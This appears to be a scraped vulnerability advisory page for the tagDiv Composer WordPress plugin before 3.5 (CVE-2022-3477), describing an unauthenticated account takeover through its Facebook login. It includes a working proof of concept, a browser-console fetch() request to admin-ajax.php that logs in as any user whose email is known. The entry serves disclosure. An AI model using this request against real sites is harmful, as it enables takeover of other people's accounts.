Lucene search
Truoc Phan from Techlab CorporationWPVDB-ID:993A95D2-6FCE-48DE-AE17-06CE2DB829EFHistoryOct 24, 2022 - 12:00 a.m.
tagDiv Composer < 3.5 - Unauthenticated Account Takeover
2022-10-2400:00:00
Truoc Phan from Techlab Corporation
wpscan.com
56
plugin security vulnerability
unauthenticated access
account takeover
EPSS
0.003
Percentile
71.0%
The plugin, required by the themes, does not properly implement the Facebook login feature, allowing unauthenticated attackers to login as any user by just knowing their email address
PoC
Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=td_ajax_fb_login_user&user;[email][email protected]’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Then refresh the page to be logged in as the user with the [email protected] email address
Related
patchstack
patchstack
cve
cve
CVE-2022-3477
2022-11-14 15:15:49
wpexploit
wpexploit
tagDiv Composer < 3.5 - Unauthenticated Account Takeover
2022-10-24 00:00:00
prion
prion
Improper access control
2022-11-14 15:15:00
nvd
nvd
CVE-2022-3477
2022-11-14 15:15:49
cvelist
cvelist
CVE-2022-3477 tagDiv Composer < 3.5 - Unauthenticated Account Takeover
2022-11-14 00:00:00